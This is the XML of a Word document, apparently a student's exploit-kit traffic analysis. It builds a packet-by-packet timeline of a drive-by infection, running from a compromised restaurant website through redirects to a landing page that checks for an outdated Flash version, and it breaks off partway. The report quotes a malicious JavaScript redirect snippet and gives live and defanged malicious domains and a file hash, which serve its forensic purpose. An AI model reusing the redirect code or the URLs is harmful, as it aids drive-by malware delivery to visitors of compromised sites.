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68183" w14:textId="77777777" w:rsidR="003C1DFC" w:rsidRDefault="00543D3F" w:rsidP="00B94DDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Attribution</w:t>
      </w:r>
      <w:r w:rsidR="00CD34AD">
        <w:t xml:space="preserve"> Analysis</w:t>
      </w:r>
      <w:r w:rsidR="00203BC7">
        <w:t xml:space="preserve"> Report</w:t>
      </w:r>
      <w:r w:rsidR="0077542C">
        <w:t xml:space="preserve"> – Report 2</w:t>
      </w:r>
      <w:r w:rsidR="009C0AE7">
        <w:t xml:space="preserve">/Rev </w:t>
      </w:r>
      <w:r w:rsidR="002D0AAC">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00203BC7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0069105D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Julie Haynes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A836F21" w14:textId="77777777" w:rsidR="00662158" w:rsidRDefault="00662158" w:rsidP="0077542C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</w:p>
    <w:p w14:paraId="1F4B3E73" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158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 w:rsidRPr="00662158"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t>Timeline Summary with Attribution Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A78630" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D3B30F" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">2015-02-15 17:33:39 | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Packet 1148</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Compromised Website:</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  There’s a “GET /HTTP/1.1” where the user (IP 192.168.137.81) visits </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Wolfgangs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Steak House at IP 211.49.170.155</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59891533" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AFF1BB1" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">2015-02-15 17:33:45 | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>Packet 1979</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>Temporary Redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D65129" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">In Wireshark there is a “HTTP/1.1 302 Found\r\n” from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>Wolfgangas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve"> at 211.49.170.155 to the user’s PC at 192.168.137.81.  Per this info there has been a redirection: </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>“The document has moved &lt;a href="hxxp://bnureb0up683ppcbgt1fz9g.isbul.info/index.php?n=anM9MSZ1YnR5emE9cXZieWJtbHQmdGltZT0xNTAyMTUyMzIzMzYzMDkyMjU3NCZzcmM9MjIwJnN1cmw9d29sZmdhbmdzc3RlYWtob3VzZS5jby5rciZzcG9ydD04MCZrZXk9MjY3Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>”.  An HTTP 302 can provide a way to continue temporary redirections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F44F1C" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E8BCE5F" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">2015-02-15 17:33:45 | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">Packet 2104 </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">Cushion redirection: </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4478ED40" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">Snort detects a cushion redirection at 23:33:45. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3288D0" w14:textId="77777777" w:rsidR="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>There’s a  “</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>GET /index.php?n=anM9MSZ1YnR5emE9cXZieWJtbHQmdGltZT0xNTAyMTUyMzIzMzYzMDkyMjU3NCZzcmM9MjIwJnN1cmw9d29sZmdhbmdzc3RlYWtob3VzZS5jby5rciZzcG9ydD04MCZrZXk9MjY3QzM5RTQmc3VyaT0vd3AtaW5jbHVkZXMvanMvanF1ZXJ5L2pxdWVyeS5qcyUzZnZlcj0xLjExLjE= HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>” which returns “</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>stjgy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "http://zz1lb82z00y16gdow25fcxm.ilaclama.us/watch.php?fuhgi=MTIyMDU5ODkwNjhkMTQ5ODNkNDI2YWEzNWJjYjNjNTJi"; var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>mmbw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>typeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>location.replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>); if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>mmbw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve"> != "undefined") { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>top.location.replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>stjgy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">); } else { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>top.location.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>stjgy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>; };</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B7883A" w14:textId="77777777" w:rsidR="000E78E6" w:rsidRDefault="000E78E6" w:rsidP="000E78E6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F1EBDE" w14:textId="77777777" w:rsidR="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">2015-02-15 17:33:47 | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>Packet 2521</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>Pointer to Landing Page</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>:  There’s a “</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>watch.php?fuhgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t xml:space="preserve">=MTIyMDU5ODkwNjhkMTQ5ODNkNDI2YWEzNWJjYjNjNTJi HTTP/1.1\r\n” </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>and a pointer to the landing page at hxxp://f9wb0396aobdotyzddcwdtf.ilaclama.us/VQlXBEpVSwQ.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F2727A" w14:textId="77777777" w:rsidR="0084797A" w:rsidRPr="0084797A" w:rsidRDefault="0084797A" w:rsidP="0084797A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162FF6">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">HASH: </w:t>
      </w:r>
      <w:r w:rsidRPr="00887510">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>d9f266eb1dbd2bca408c837c3c4eaa39135417649ace63ba20d58c2df88ea19f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611E6917" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B28F17" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">2015-02-15 17:33:54 | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Packet 2611</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Landing Page and Outdated Flash Detected</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B28493C" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">Snort detects an outdated Windows Flash version for IE at 23:33:54.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038E6183" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t>In Wireshark, there’s a “</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>GET /B0hCSgFdUgdNBhhTTAMCBFAHAQIGXFJMAAcESgQNHwZTUh4HBUoCWwc</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t>”.  It looks like this is where the landing page is detecting the flash version to see if its outdated and vulnerable.</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F827C" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00162FF6" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The landing page URL is “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>hxxp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>://f9wb0396aobdotyzddcwdtf.ilaclama.us/VQlXBEpVSwQ.html”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D82C0" w14:textId="77777777" w:rsidR="00162FF6" w:rsidRPr="00662158" w:rsidRDefault="00162FF6" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162FF6">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">HASH: </w:t>
      </w:r>
      <w:r w:rsidR="0084797A" w:rsidRPr="00887510">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>d9f266eb1dbd2bca408c837c3c4eaa39135417649ace63ba20d58c2df88ea19f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750DBFF6" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8A33C2" w14:textId="77777777" w:rsidR="00662158" w:rsidRPr="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve">2015-02-15 17:33:54 | </w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Packet  2617</w:t>
      </w:r>
      <w:r w:rsidRPr="00662158">
        <w:t xml:space="preserve"> | </w:t>
